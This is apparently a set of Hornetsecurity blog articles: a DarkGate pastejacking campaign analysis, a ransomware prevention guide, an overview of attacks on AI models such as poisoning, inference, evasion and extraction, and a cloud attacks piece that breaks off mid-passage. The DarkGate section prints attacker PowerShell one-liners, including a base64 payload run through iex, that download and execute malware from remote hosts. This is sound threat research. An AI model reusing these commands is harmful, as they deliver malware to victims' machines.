Darkgate Pastejacking – Analysis and Breakdown of the Attack Chain

Darkgate Pastejacking – Analysis and Breakdown of the Attack Chain


Vade’s Threat Intelligence and Response Center – (now part of Hornetsecurity!) recently observed a number of malicious phishing campaigns distributing Darkgate using an unusual technique called Pastejacking. DarkGate is a sophisticated and evolving malware family, first documented in 2018, and used for information stealing and remote access capabilities and known to employ advanced evasion techniques to avoid detection by antivirus software and other security measures.

In this article, we present a step-by-step breakdown of how attackers are attempting to deliver Darkgate via pastejacking based on real emails intercepted by our email security solutions.

NOTE: The below analysis contains many defanged URLs (hxxps instead of https). This is done to protect the reader from accidental clicks. It goes without saying that this documentation is provided for research purposes, and you should NOT attempt to utilize the below URLs in any way unless you’re a trained security professional. Hornetsecurity is not liable for any damage arising from the use of this information.

The Campaign

During May 27 and 28, a total of 105,640 phishing emails were sent from 17 actor controlled domains.

The emails contain brief sentences designed to create a sense of urgency or authority, urging the receiver to open the malicious attachment under the pretext of needing to review or complete a document. These sentences exhibit classic phishing techniques commonly used by threat actors.

A phishing email pretexting an unpaid bill

An HTML document named clarify_27-May\_{6 random digits}.html or Scanned_05_28-2024_\_{6 random digits}.html is attached. When opened, the page displays a fake Microsoft OneDrive folder with a loading circle, attempting to convince the victim that a PDF called “Reports.pdf” is opening.

A fake OneDrive folder loading circle

After 2 seconds, the loading GIF is hidden, and an error message appears stating that the document couldn’t be opened due to a connection error. According to the message, the DNS cache should be updated manually to fix this error.

A connection error requires the DNS cache to be updated

Due to an event listener on the document, when any part of the page is clicked outside the error box, an alert is shown with the message:

Failed to connect to the “OneDrive” cloud service.

The “Details” button redirects to the official Microsoft documentation on how to troubleshoot issues on DNS servers.

When the “How to fix” button is clicked, a new message appears.

A message explaining how to fix the DNS error

This message is prompting the victim to open a Windows terminal or PowerShell console and paste the clipboard content.

In the backend, when the button is clicked, the JJ JavaScript function is called which copies the web page’s title content, previously decoded by the atob function, to the clipboard thanks to the now-deprecated exeCommand(“copy”) method. This technique is referred as Pastejacking.

The title's content is decoded and copied to the clipboard

If an unsuspecting victim adheres to the instructions, the following commands are executed:

ipconfig /flushdns
$base64 = "JGppID0gImh0dHBzOi8va29zdHVtbjEuaWxhYnNlcnZlci5jb20vMS56aXAiOw0KJG5lID0gI mM6XFxkb3dubG9hZHMiOw0KTmV3LUl0ZW0gLUl0ZW1UeXBlIERpcmVjdG9yeSAtRm9yY2UgLVB hdGggJG5lOw0KSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkamkgLU91dEZpbGUgJG5lXHBsLnppc DsNCkNsZWFyLUhvc3Q7DQpFeHBhbmQtQXJjaGl2ZSAkbmVccGwuemlwIC1Gb3JjZSAtZGVzdGl uYXRpb25wYXRoICRuZTsNClJlbW92ZS1JdGVtIC1QYXRoICRuZVxwbC56aXA7DQpTdGFydC1Qc m9jZXNzICRuZVxBdXRvaXQzLmV4ZSAkbmVcc2NyaXB0LmEzeA0KW1N5c3RlbS5SZWZsZWN0aW9 uLkFzc2VtYmx5XTo6TG9hZFdpdGhQYXJ0aWFsTmFtZSgiU3lzdGVtLldpbmRvd3MuRm9ybXMiK TsNCltTeXN0ZW0uV2luZG93cy5Gb3Jtcy5NZXNzYWdlQm94XTo6U2hvdygiVGhlIG9wZXJhdGl vbiBjb21wbGV0ZWQgc3VjY2Vzc2Z1bGx5LCBwbGVhc2UgcmVsb2FkIHRoZSBwYWdlIiwgIlN5c 3RlbSIsIDAsIDY0KTsNCkNsZWFyLUhvc3Q7DQo="; iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64Str ing($base64))); Set-Clipboard -Value " "; exit;

The first command clears the DNS resolver cache, forcing the computer to discard any stored DNS entries and fetch new ones from the DNS server. This command doesn’t do anything malicious; it’s only here in an effort to trick the victim into thinking that the fake DNS problem is being resolved.

Next, a base64 string is decoded and executed thanks to the iex PowerShell cmdlet.

Finally, the clipboard is “cleaned” by setting its value to four spaces.

When decoded, the $base64 variable reveals a malicious PowerShell script:

$ji = "hxxps://kostumn1.ilabserver.com/1.zip";
$ne = "c:\\downloads";
New-Item -ItemType Directory -Force -Path $ne;
Invoke-WebRequest -Uri $ji -OutFile $ne\pl.zip;
Expand-Archive $ne\pl.zip -Force -destinationpath $ne;
Remove-Item -Path $ne\pl.zip;
Start-Process $ne\Autoit3.exe $ne\script.a3x
[System.Windows.Forms.MessageBox]::Show("The operation completed
successfully, please reload the page", "System", 0, 64);

When executed, this script downloads a ZIP document called 1.zip from a remote server, saves it in the c:folder, unzips the content and deletes the previously downloaded ZIP. Then, to perform the infection, it runs Autoit3.exe with script.a3x as an argument.

Finally, “The operation completed successfully, please reload the page” is displayed in a message box.

1.zip content

AutoIt3.exe is the executable for the AutoIt scripting language, which is designed for automating the Windows GUI and general scripting. As previously documented by researchers, DarkGate commonly uses AutoIt scripts as part of its initial infection routine.

The URL has activity attributed to the DarkGate malware

Previous Campaigns

Previous DarkGate campaigns during 2024

May 17

On May 17, a similar campaign occurred: around 43,600 mails were sent from 11 actor-controlled domains.

A Microsoft Office Word theme was used to trick the user using a similar approach.

 A Microsoft Word lure
cmd /c start /min powershell $jr = 'c:\users\public\Dp.hta';
invokewebrequest -uri hxxps://jenniferwelsh.com/header.png -outfile $jr; startprocess $jr;Set-Clipboard -Value ' '; exit;

The command copied in the clipboard downloads and executes a PowerShell script from hxxps://jenniferwelsh.com/header.png. The script is saved in a HTA file located in c:

Malicious HTA downloaded form a remote server

This lightly obfuscated script downloads its next stage from hxxps://mylittlecabbage.net/qhsddxna, a PowerShell script which downloads a ZIP from hxxp://mylittlecabbage.net/xcdttafq containing the AutoIt3 executable with its script.a3x. The script also contains a Spanish string that can be translated to “opening the Calculator”.

May 8

On May 8, around 57,500 phishing emails were sent with an attached PDF urging the victim to download a fake Java installer to access a document.

Malicious PDF inciting the victim to download a fake Java installer

May 2

On May 2, another campaign using the same Microsoft Word theme occurred: around 43,600 phishing emails were sent.


Based on the receiver’s domains, these campaigns seem to target a wide array of industries and geographic locations, reflecting a broad and opportunistic, approach, aimed at financial gain. During the May 27-28 campaigns, based on our observations, Western Europe (France, Germany and Spain) and North America (United States and Canada) were the focus. Finally, this phishing campaign targeted 75% of its efforts towards the B2B (Business-to-Business) sectors and 25% towards the B2C (Business-to-Consumer) sectors.


This research highlights how DarkGate malware continues to trend and remains active in the cybersecurity landscape. Despite ongoing efforts to combat and mitigate its impact, DarkGate has shown resilience and adaptability, maintaining its presence in various attack vectors (fake browser updates or Teams messages) and leveraging creative techniques to achieve its goals.

One of the most effective ways to defend against such threats is to provide next-gen end-user security awareness training via a trusted service like the Security Awareness Service from Hornetsecurity. In this case, with proper security training, targeted end users would be able to identify abnormal requests (like pastejacking) in potentially malicious emails. 

Indicators Of Compromise

May 27-28 Sender domains:

  • megabrightsigns[.]com
  • languangjob[.]com
  • top10nursingschools[.]com
  • rumsfeldfinance[.]com
  • quantummerchandise[.]com
  • sonicwarrior[.]org
  • scsho[.]com
  • euthanizerent[.]com
  • xpacgdh[.]com
  • welcomenymegoo[.]com
  • shawlasereye[.]com
  • bloggersua[.]com
  • ruthlesslyfests[.]com
  • shirleymallin[.]com
  • nightstarmusic[.]com
  • rumsfeldsecurity[.]com
  • nightstarmusic[.]com

May 17 Sender domains:

  • ethspark[.]com
  • exportersnet[.]com
  • languangjob[.]com
  • yerembe[.]com
  • eiqtechnology[.]com
  • wthome[.]cn
  • gwempresarial[.]com
  • udportuariosdisarp[.]com
  • automobile-locksmith[.]com
  • shanteauconsulting[.]com
  • udportuariosdisarp[.]com

May 27-28 Usernames:

  • webmaster
  • fastsupport
  • accounting
  • bill
  • contact
  • jessie
  • limited
  • noreply
  • cls
  • gpk
  • support
  • company
  • anna
  • eva
  • information
  • info
  • service
  • alan
  • admin
  • lexisnexis
  • marketing
  • energy
  • springenergy
  • manager
  • global
  • solutions
  • director
  • solutions

May 17 Usernames:

  • admin
  • support
  • no-reply
  • auto-reply
  • smacleod
  • administrator
  • office
  • usr
  • samer
  • system
  • transfer
  • user
  • office2
  • service
  • info
  • dave
  • transfer

Files SHA-256:

  • 5316fc2cb4c54ba46a42e77e9ee387d158f0f3dc7456a0c549f9718b081c6c261.zip
  • 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95dAutoIt3.exe
  • 493fb733897f4c3d7adf01d663e711e2e47240bfdf5b99abd230aa809f43a8cfscript.a3x
  • 6799222df869a6440bc3372604c36f25efc784292d74901fb2b62695f00acd67header.png
  • 4b61c21167fbe9a6573fdb6e68889fd4db180e7a8d41b9ee049ca6d54341c8f9qhsddxna
  • 9a8b0ebe7b18da6e638fdc9f7e1353c56a561419b12932aff6b0a42a7fe6ac12xcdttafq
  • 0116d3f7e5ecafaf572141a6eaf3bffa80ff04519872be77f07f4b284272db5dscript.a3x


  • hxxps://kostumn1.ilabserver.com/1.zip
  • hxxps://jenniferwelsh.com/header.png
  • hxxps://mylittlecabbage.net/qhsddxna
  • hxxp://mylittlecabbage.net/xcdttafq
  • hxxps://linktoxic34.com/wp-content/themes/twentytwentytwo/dark.hta
  • hxxps://dogmupdate.com/rdyjyany
  • hxxps://adztrk.com/ouh5d
How to Prevent Ransomware Attacks: An Easy-to-Follow Guide

How to Prevent Ransomware Attacks: An Easy-to-Follow Guide

It’s been the scourge of businesses globally for several years now, and shows no sign of abating – ransomware, which makes ransomware attack prevention crucial.

Not a new threat, but growing in seriousness over the last few years, aided by the ease for the criminals of getting paid via various cryptocurrencies, coupled with the increasing digitalization of society and businesses which has increased our reliance on our IT systems.

In this article we’ll look at how to prevent your business falling victim to a ransomware attack. As you can probably guess, this isn’t simple – “just run antivirus software” was OK twenty years ago, but in today’s risk landscape a more holistic approach is required.

This is also not an enterprise only danger, as small and medium business are often soft targets, with smaller budgets and less focus on cyber security.

We’ll break it down into two parts, first what to do to prevent ransomware attacks in the first place, and second, what to do if that fails and an attack is in progress.

Fundamental Steps to Prevent Ransomware Attacks

It starts with backup – if all else fails you need offline, encrypted copies of your data, preferably stored in immutable cloud storage.

Criminals know this of course, and will often lurk in your environment for months, corrupting, encrypting or otherwise invalidating your backup files, to ensure that when your production systems and files are encrypted, and you attempt to restore your files, you can’t. This will significantly increase the likelihood of payment.

Backup is boring and routine, and often fades into the background. To combat this, you need to test restoring both data and full systems regularly and ensure that the process is well documented which leads to successful restorations.

The benefit of immutable cloud storage can’t be underestimated, as the data stored there can’t be altered or deleted (until it’s expiry date).

Don’t forget the systems themselves. Attackers will focus on your data, as this is the one thing a modern business can’t function without, but having up to date documentation and templates for your infrastructure components will help immensely when the pressure is on, and everything is down.

Use Infrastructure as Code (IaC) for cloud services, this will also speed up recovery considerably.

The next step after backup is adopting a Zero Trust architecture. This requires many different improvements to technology, process and people, but is fundamentally a mind shift. Here we’ll focus on a few different core pillars, such as strong, cloud based, identity verification.

Using just usernames and passwords to access business data is no longer sufficient. Implement Multi Factor Authentication (MFA) for everyone, ideally phishing resistant technologies such as FIDO2 hardware keys, or Windows Hello for Business (biometrics).

This involves a technology component (requiring the right technology), as well as processes (addressing scenarios like someone leaving their key at home or securely onboarding new staff) and people (ensuring everyone knows how to authenticate and what to do in case of a suspicious authentication prompt, for example).

A part of Zero Trust is also making sure not to overprovision permissions and run regular access reviews to ensure that staff (and external users) only have the permissions they require.

For administrative users, have separate account for their day-to-day user account, and if you have on-premises Active Directory, as well as a cloud directory, have separate, different admin accounts for each environment to minimize the risk of attackers pivoting from one to the other.

Another part of zero trust is network segmentation (easy to do in public clouds, hard to do on-premises) so that if an attacker gains a foothold, they don’t automatically have access to everything on “the inside”.

Keeping all operating systems up to date with the latest security patches is important and challenging. Add to that keeping firmware of all systems, as well as all installed applications patched, and this becomes a huge task.

Make sure to use automation as much as possible to achieve this. Hand in hand with patching is asset inventory – you can’t protect what you don’t know exists so use a good system for this. And the yin to the asset inventory yang is vulnerability management, scanning all systems for security vulnerabilities.

This is a Sisyphean effort, as new vulnerable attack surfaces are continually found in software, assigned CVEs and CVSS scores, and then you find out that they’re in your environment, then you patch them, and while you do that, more vulnerabilities are found.

Thoroughly investigate your Mobile Device Management (MDM) and Remote Monitoring and Management (RMM) tools, ensure they have only the permissions they need, and keep them up to date, they have enormous reach across your digital estate and have been used to compromise many enterprises.

Understanding the risk landscape is critical, our annual Cyber Security Report can help, as can our Ransomware attack survey report.

Technical Steps to Stop Ransomware Attacks

Now we’ll go a bit deeper into technical controls to implement, again the focus is on preventing a ransomware attack, but this will also decrease your overall attack surface.

Block the Remote Desktop Protocol (RDP) protocol and only allow access where necessary, and then only from specific designated systems. Also implement MFA to protect remote access and Secure Shell (SSH) access.

Disable SMB v1 and implement SMB signing and SMB encryption in a Windows network. Implement Local Admin Password Solution (LAPS) with Entra ID (formerly Azure AD) to ensure each device has a unique local administrator password, making lateral movement harder for attackers.

Use Attack Surface Reduction (ASR) rules to protect the Local Security Authority Subsystem (lsass) and enable Credential Guard (on by default in Windows 11 22H2 and later).

Pay attention to PowerShell remoting security settings, enable Remote Credential Guard and use either Defender Application Guard plus Applocker (very hard to implement at scale) or Airlock Digital. And if you’re using PowerShell for management at scale, enable logging.

Technical Steps to Stop Ransomware Attacks

Change the default usernames and passwords for any new device (particularly networking gear) and implement a good password manager (in small environments) or an enterprise password vault for larger businesses.

If you have in-house software applications that store accounts and passwords, ensure a good hashing algorithm is used, such as BCrypt with a high work factor. Similarly, keep offline backups of your source code in case of a successful ransomware attack.

If you have to provide user VPN access, ensure that the device or server is hardened and kept up to date, and enforce MFA authentication for every VPN connection.

For your DNS resolution infrastructure, implement protective DNS filtering services which will close security gaps, block malicious links and help in preventing ransomware attacks.

Malicious emails are still the preferred method for the attackers to gain initial access so email hygiene is vital. Use SPF, DKIM and DMARC along with a strong advanced threat protection (ATP) solution to keep suspicious emails with a malicious link or suspicious email attachments out of user’s inboxes.

As no system is 100% effective, augment this with comprehensive, low administration overhead security awareness training solution that’s ongoing.

Being Prepared for Ransomware Threats

So far, we’ve covered preventative measures, and two of the zero trust pillars (strong authentication and least privilege access), the third pillar is assuming breach.

You can do everything possible (given the IT security team and budget), but you must also plan for when these controls fail, and malware ransomware attacks are in progress or have been discovered.

This starts with having a cyber incident response plan. Depending on the size and industry vertical your business is in, the content will vary, but at a minimum it must define:

  • Which data protection regulations or data breach notification laws you must comply with, and what their timeframes and bodies to report a breach to are.
  • Which systems are business critical and must receive the highest level of protection, and in which order should they be recovered in an emergency situation.
  • How systems can be isolated from the network, and step by step instructions for recovering business critical systems.
  • The hierarchy of decisions related to a major cyber incident. If all your systems are down, and your important data unrecoverable, except by paying the ransom (and thus getting the decryption key), who makes that decision? If the criminals in question (where this can be ascertained) are sanctioned entities – can a payment even be made? If you’re going to use a ransomware negotiation service, do you have one “lined up” for when disaster strikes? The more you have thought about and prepared for these situations, the more smoothly it will go when everyone is under immense pressure.
  • The plan must be practiced. Turn off systems to simulate successful attacks (make sure to consult with relevant business stakeholders ahead of time and select low traffic times to do this). Run tabletop simulations with system administrators, security teams and the leadership team to identify gaps in processes and remedy them.

Apart from having a plan to manage a ransomware infection, keeping the plan up to date and practicing it frequently, you must have the right security tools in place.

Endpoint Detection and Response (EDR) on every endpoint is required, preferably augmented with eXtended Detection and Response (XDR) solutions that doesn’t just look at endpoint security, but also takes into account network traffic, mobile devices, identity, cloud services etc.

All this telemetry and alerting will be for nought, however, if you don’t have staff to monitor incoming warnings. Especially in small and medium businesses, it’s not uncommon to find in the aftermath of a ransomware attack that the signs were there in security applications, but no one was looking.

A solution here is Security Information and Event Management (SIEM), which ingests data from all your EDR, XDR and email hygiene solutions, analyzes it for cyber threats and presents incidents in a single pane of glass.

Ultimately this enables your security teams to go beyond a reactive approach and merely reacting to alerts defined in your various security tools, to taking a proactive approach and using the collected data to do threat hunting.

To properly protect your cyber environment, use Hornetsecurity Security Awareness Service, and Advanced Threat Protection to secure your critical data.

We work hard perpetually to give our customers confidence in their Spam and malware Protection, Email Encryption, and Email Archiving strategies.

To keep up to date with the latest articles and practices, pay a visit to our Hornetsecurity blog now.


Preventing ransomware infection isn’t easy, and it takes a lot of work to harden your operating systems, networks and cloud environments as you have seen in this article. It’s also an ongoing process that requires constant investment as threat actors refine their ransomware variants and perfect their social engineering tactics.

Furthermore, it’s not just a technical problem, you must also involve everyone in the business and build a security culture where all human users recognize the risks and work together for ransomware protection. But it can and must be done – the alternative is too risky.


How can ransomware attacks be prevented?

There are many steps required to harden your systems, authentication and identity systems and especially improving your “human firewalls” through security awareness training – all leading to a stronger security posture, and to ransomware prevention.

What are the two main defenses against ransomware?

You need strong identity authentication, using MFA, plus a strong email hygiene solution to prevent a malicious attachment, for example becoming the initial access point.

Can you protect yourself from ransomware?

Yes, there are many steps outlined in this article that you can use to increase the ransomware resistance and cyber security resiliency of your organization to make it much less likely that you’ll be compromised.

The Vulnerability of AI to Cyber Attacks – AI’s Achilles’ Heel

The Vulnerability of AI to Cyber Attacks – AI’s Achilles’ Heel

Artificial Intelligence (AI) attacks are not quite at the level of Skynet depicted in the 1984 film “The Terminator,” but this hasn’t stopped the speculations and real-world implications around AI technological advances.

Although the science fiction within “The Terminator” story is farfetched, we have now seen the rise in Artificial Intelligence attacks and attacks on AI systems.

Let’s dive into the vulnerabilities of Artificial Intelligence and Machine Learning models to understand how we can protect that Achilles’ heel.

What Is Artificial Intelligence?

Artificial Intelligence combines computer science and complex datasets. In conjunction with machine learning (ML) and deep learning, AI algorithms can take input information to make predictions and classifications based on the data it can access.

 The term intelligence within AI directly relates to these computer programs’ ability to mimic human characteristics where we can reason, discover, generalize, and learn from past experiences. Then, apply adjustments with artificial intelligence to improve or change actions based on these learned experiences.

What’s the Role of AI/ML in Cybersecurity?

The primary role of artificial intelligence in data security and cyber security is the ability to process large amounts of logging and monitoring data to find anomalies, make recommendations or adjustments to security controls.

Something that human intelligence can miss is specific patterns and identification of potential threats; AI rapidly improves the accuracy of these detections to filter out false positives.

This allows Security Operations Centre (SOC) teams to focus on critical and filtered alerts, increasing the ability to respond to attacks and implement security improvements rapidly. With this susceptibility to Artificial Intelligence attacks, cybersecurity teams must collaborate with development teams and leverage available technologies.

This level of autonomy for preventative measures and detection presents the counter to defense and offense. These same tools, models, and algorithms are also utilized for malicious intent, which has significantly increased across all levels of business.

Types of AI Attacks & the Dangers of Cyber Attacks on AI

Generative AI is one of the fastest-growing applications of AI models, which is the creative generation of text, images, videos, and music.

With these improvements to generative AI, attacks have been leveraging these models to create convincing content for use with malware code, phishing emails, fraud, and voice/video impersonation scams.

As the demand for AI models increases across business and consumer environments, the attack layer of these services drastically amplifies. You can take traditional labor-intensive roles and use machine learning to reduce overhead and improve these services.

As the prevalence of AI increases, so does the defense against these types of attacks on AI. The following sections outline some of the more common methods of Artificial Intelligence attacks:

Types of AI Attacks & the Dangers of Cyber Attacks on AI

AI uses training data and input information to grow and adapt responses and complexity to output information. An Artificial Intelligence poisoning attack occurs when the training data is intentionally tampered with or injected with malicious data.

This affects the output of the AI, which can cause incorrect, false, or even highly offensive responses or results.

One example of this type of Artificial Intelligence attack was that of “Tay,” an early version chatbot created by Microsoft in 2016 as an experiment. Unfortunately, the chatbot data was poisoned with far-right information and ideologies by people on the internet, which caused the AI to start responding with extremist remarks.

Within 24 hours, the chatbot was taken down after it went on a tirade of over 96,000 tweets, many of them highly offensive tweets.


AI systems are trained on large datasets, often containing names, addresses, birthdays, passwords, payment cards, health information, phone numbers, and other forms of sensitive information.

An inference attack aims to reveal sensitive information by probing the machine learning model, reviewing the response, and altering the prompts to get the system to reveal this sensitive data.

Membership Inference (MI) is when the attacker attempts to rebuild the training data for exploitation. They will run the records through a machine-learning model to determine if they belong to a training dataset.

In most cases, the machine learning model will output a more robust confidence response when provided with training data instead of unknown or new data.

The other type of inference attack is Attribute Inference (AI), where the attacker has some knowledge of the training records or datasets and exploits this to expose missing attributes.

In addition, Approximate Attribute Inference (AA) aims to find values close to the target attributes. This attack becomes more successful when the target machine learning has been overfitted, meaning that the machine learning model hasn’t been given enough training data or if the training data has become stale.

As AI models have improved in countering this type of exploit, attackers have combined both methods; these types of Artificial Intelligence attacks are called Strong Membership Inference (SMI).

Where membership influence tends to confuse member examples and non-members with similar attributes, the SMI attack can tell the difference between a member and a non-member if they are identical. Although significantly more complicated, this method can be hit or miss.


An Evasion attack occurs when the machine learning model is injected with an “adversarial example”; the input data is carefully altered to look like the expected data but with tampered information to throw off the classifier.

The goal is to create a blind spot for classification errors. For example, images of stop signs could be injected with alterations to classify them as something else. When the AI interprets the stop signal input, it incorrectly classifies the object.

Businesses and companies usually targeted by these types of Artificial Intelligence attacks are driverless automobile manufacturers.


Model extraction attacks are one of the more prominent attacks on Artificial Intelligence. The attack aims to target the machine learning models specifically to try and extract the training data.

Other attack methods, such as inference, are used to probe the data and extra as much of this data to exploit further.

Why do Artificial Intelligence Attacks Exist?

Artificial Intelligence attacks exist simply because of how they can be exploited. Unlike traditional cyber security attacks, the underlying Machine Learning models and algorithms are susceptible to a broader range of attacks.

This usually doesn’t directly correlate to the development of the AI models, more so the shortcomings of the current state of the AI landscape and advancement of attack methods.

With anything built around adaptive learning, be it Artificial Intelligence or even humans, there is always an opportunity for incorrect information to be seeded and exploited to coerce the target. Although humans can generally interpret data more dynamically, AI is purely logical.

This hasn’t prevented the speed at which AI has evolved, even though at least 5 AI models have now successfully beaten the “Turing Test.” The first to beat the “Turing Test” model was Eugene Goostman in 2012, a chatbot presented as a 13-year-old Ukrainian boy. It convinced 29% of the judges on the “Turing Test” that it was human.

How to Prevent and Recover from AI Attacks?

As with any proactive defense mechanism, it’s diversity in the approach that will provide the best outcome—implementing multiple controls to protect against Artificial Intelligence attacks and to detect when an attack has occurred.

Dynamic review and assessment of the training and source data is a crucial area to focus on. This is one of the most significant weaknesses of any AI; if the information used for the model to build its responses has been compromised, the impact and recovery efforts are relatively high.

Continuous data security analysis and improvement throughout the development lifecycle will reduce the likelihood of poisoning. Reviewing and revalidating systems, features, and components with any development process is rudimentary.

Dynamic cybersecurity risk assessments are performed by a third party with the capability to review and interpret AI systems. Having an unbiased partner review the infrastructure and AI systems can ensure that not only business requirements are met but also technical requirements.

The AI field is rapidly growing, with new attacks, vulnerabilities, and exploits emerging daily. Ensuring collaboration between cybersecurity teams, developers, and data engineers is critical to maintaining a healthy lifecycle.

Countering Attacks on AI in the Future

The focus on countering Artificial Intelligence attacks is increasing as the demand for AI technologies and services hits mainstream business.

The primary method of combating attacks on AI in the future is laying down the foundations and framework to maintain implementation governance.

The European Telecommunications Standards Institute (ETSI) Industry Specification Group and The European Union Agency for Cyber Security (ENISA) have both developed framework and technical standards: Securing Artificial Intelligence (ETSI: ISG SAI) and Framework for AI Cybersecurity Best Practices (ENISA: FAICP).

These standards have a crucial role in improving the security of existing and new AI technologies. These standards address three aspects of AI:

  • Securing AI from attack: AI is a system component, and underlying infrastructure requires adequate protection;
  • Mitigating against malicious AI: Enhance and improve conventional attack layers where AI is used;
  • Using AI to enhance security measures: Protect systems against attacks using AI as part of the solution or countermeasures.

As AI technology continues to improve, so must our governance and tooling; this will significantly reduce the risk of Artificial Intelligence attacks.

In anticipation of the future, Hornetsecurity recognizes the growing prevalence of AI attacks, poised to pose daily challenges for professionals. We recommend exploring our annual Cyber Security Report, which offers a thorough analysis of the Microsoft 365 threat landscape.

This comprehensive report is crafted from meticulous real-world data collection and study conducted by Hornetsecurity’s dedicated Security Lab team.

To properly protect your cyber environment, use Hornetsecurity Advanced Threat Protection, and Security Awareness Service to secure your critical data.

We work hard perpetually to give our customers confidence in their Spam & Malware Protection, Email Encryption, and Email Archiving strategies.

To keep up with the latest articles and practices, visit our Hornetsecurity blog now. Until the next one, hasta la vista, baby.


The undeniable power of AI is accompanied by a critical vulnerability—its susceptibility to cyber-attacks. Often referred to as AI’s Achilles’ heel, this inherent weakness demands rigorous cybersecurity measures.

AI is here to stay, and will influence cyber security, both offense and defense for the foreseeable future. This article covered many of the ways that AI systems can be attacked and subverted, just like with any technology we use in business, don’t assume that AI is safe without paying attention.

As we embrace the benefits of artificial intelligence, safeguarding against malicious exploits becomes imperative for the integrity and reliability of AI systems in an increasingly interconnected world.


What is an example of an AI attack?

There are many types of Artificial Intelligence attacks, but the adversarial example is a good one. An attacker could take an image of a dog, apply digital camouflage invisible to the human eye over the top of the original image, and then re-classify the dog as a cat. It seems innocent enough except when considering the use case of traffic lights, stop signs, and speed limits for driverless cars.

How is artificial intelligence used in cyber-attacks?

Generative AI is the primary AI model used to create content for cyber-attack campaigns, such as phishing, impersonation for social engineering, and malware code generation.

How is AI a threat to security?

The improvements and accessibility of generative Artificial Intelligence have changed the cybersecurity landscape. As much as AI can generate tests, images, music, and videos, so can it create malware. Some examples seen are:

  • Automated malware;
  • Cyber-attack optimization;
  • Bot vs Bot attacks;
  • Intrusion probing;
  • Physical safety (Autonomous cars, infrastructure, etc.).

What are some examples of AI in cyber security?

  • Malware and phishing detection;
  • Task Automation;
  • Intrusion detection and prevention;
  • Breach risk prediction;
  • Knowledge consolidation;
  • Detection and prioritization of new threats.

Will AI manipulate humans?

In short, yes, we have already seen this with deep fake videos and AI-generated phishing campaigns. As technology improves, so do the possibilities of human manipulation.  

Tested Techniques for Preventing Cloud Attacks on Your System

Tested Techniques for Preventing Cloud Attacks on Your System

Whenever we see a technology rising in the market, it quickly becomes one of the targets for hackers. The same is happening with the cloud. According to Statista, as of 2023, 60% of corporate data is stored in a public cloud hosted by AWS, Microsoft, Google, and others.

Additionally, the Compound Annual Growth Rate (CAGR) estimated the growth of cloud will rise from $445.3 billion in 2021 to $947.3 billion by 2026. This means more data will be stored and processed in the cloud and more cloud attacks will occur.

In July 2023, Chinese hackers attacked Microsoft’s cloud (Azure) and stole over 60,000 emails from the U.S. government. This was a cloud attack, and is just one example, numerous others exist.

This article is about cloud computing cyber-attacks, how to prevent them, and how the Hornetsecurity security portfolio helps you achieve cloud security and safety.

Cloud Attack: Definition and Causes

Cloud attacks, like any other attack is driven by criminals or black hat groups. They exploit vulnerabilities in the cloud systems and inject malware or they get into the systems such as EC2 instances and then install malicious software. Malware or malicious code stops the system and data from operating and causes business disruption.

How does this happen? There are many different reasons from poor security hygiene to misconfiguration. We will explore it more thoroughly in the next section.

Most Common Types of Cloud Computing Attacks

Cloud security is a shared responsibility. Just because data is stored within a cloud service, does not mean the cloud provider is liable for the safety of that data. On the contrary, cloud security is a shared responsibility.

According to a Ransomware attacks survey we conducted in 2020, where we asked IT professionals if they believed that data stored within Microsoft 365 was suspectable to ransomware threats, 25% of IT professionals either didn’t know or believed the answer was no. This false belief could lead to various problems, from misconfigurations to security issues.

Different types of cloud attacks

Misconfiguration is one of the main reasons cloud systems or services are compromised by malicious people.

Misconfiguration happens because individuals or teams do not follow security best practices which can lead to several problems such as supply chain attacks, Denial of Service (DoS), Distributed Denial of Service (DDoS), ransomware cloud attacks, and other threats that target Software as a Service (SaaS), Platform as a Service (PaaS), and Infrastructure as a Service (IaaS).

What can be considered misconfigurations?

It includes poor password policies, lack of 2FA, exposed unused ports, lack of data and database encryption, unsecured APIs, lack of monitoring and logging, publicly accessible storage buckets, mis-configured firewall policies, and others.

Unsecured API falls into the scope of misconfiguration. It is one of the growing risks for an organization that runs or offers cloud services. Some of the known issues are broken user authentication, improper asset management, excessive data exposure, mass injection, lack of resource rate limiting, and more. Unsecured APIs can expose sensitive data and offer unauthorized access to attackers.

Have you heard of a Man-in-the-cloud (MITC) attack? This is a new type of cloud attack that enables an attacker to take control of the victim’s machine via a synchronization account used for OneDrive, Google Drive, Dropbox, and Box. It is called a Man-in-the-cloud attack because the attacker inserts himself between the user and the cloud service and manipulates data between them. How does it happen? Weak credentials.

Have you heard the story of Paige Thompson? She resigned from Amazon, breached firewall vulnerability, and expose publicly the credit information of Capital One’s customers. Paige was an insider threat to the organization.

One of the biggest DDoS (Distributed Denial-of-Service) cloud attacks that reached a size of 2.54 Tbps was done against Google cloud services. An attacker sent spoofed packets to 180,000 servers which forwarded responses to Google servers. Google said they mitigated it.

There are different types of DoS and DDoS cloud attacks, attaching your application, website, hypervisor, and network. Nonetheless, the solution guides us toward the same path. We should implement proper DoS and DDoS protection against website, application, or network attacks.

Hypervisors running in the cloud are also prone to cloud computing cyber-attacks such as VM escape (compromising a VM and then gaining access to the underlying host, and all other VMs on that host), hyperjacking, hypercall, and DoS (Denial-of-Service) attacks, and others.

Hyperjacking is a type of cloud attack in which the attacker takes control of the hypervisor and virtual machines. On the other hand, a hypercall attack is an attack in which the attacker impersonates a guest through the hypercall interface positioned between the domain and hypervisor, subsequently gaining access to the machines.

Cloud malware attacks are one of the most common cloud attacks that happen on-premises and cloud. Attackers are using phishing emails to trick users into executing malicious software that gives them unauthorized access to SaaS, PaaS, or IaaS. One wrong click and your data hosted in the cloud can be infected by ransomware.

Ransomware attack flow

There are numerous additional types of cloud attacks; however, they are variations on the ones we previously mentioned.

Let’s now investigate some examples of cloud cyber-attacks that occurred in the last decade.

Real-World Cloud Attack Examples

Numerous cloud cyber-attacks occurred over the last decade. We already mentioned one that happened with Microsoft public cloud in July 2023 and we already mentioned Paige Thompson’s attack in the last section.

She was a former Amazon engineer who resigned, and then exploited a vulnerability in the web application firewall and breached the credit information of Capital One’s customers. Paige exposed credit cards and credit scores, payment history, contact information, and over 100,000 Social Security Numbers.

According to the Department of Justice, Thompson built a tool she used to scan misconfigured accounts in AWS. She was found guilty.

This was considered one of the largest financial data breaches.

In 2020, MongoDB cloud servers were affected by a ransomware attack designed to wipe all data from misconfigured databases. The attacker used a script to find databases which lacked password protection, then deleted the content and uploaded a ransom note demanding payment via Bitcoin.

The hacker also threatened he would report the breach to the General Data Protection Regulation (GDPR) if the victim did not make a payment.

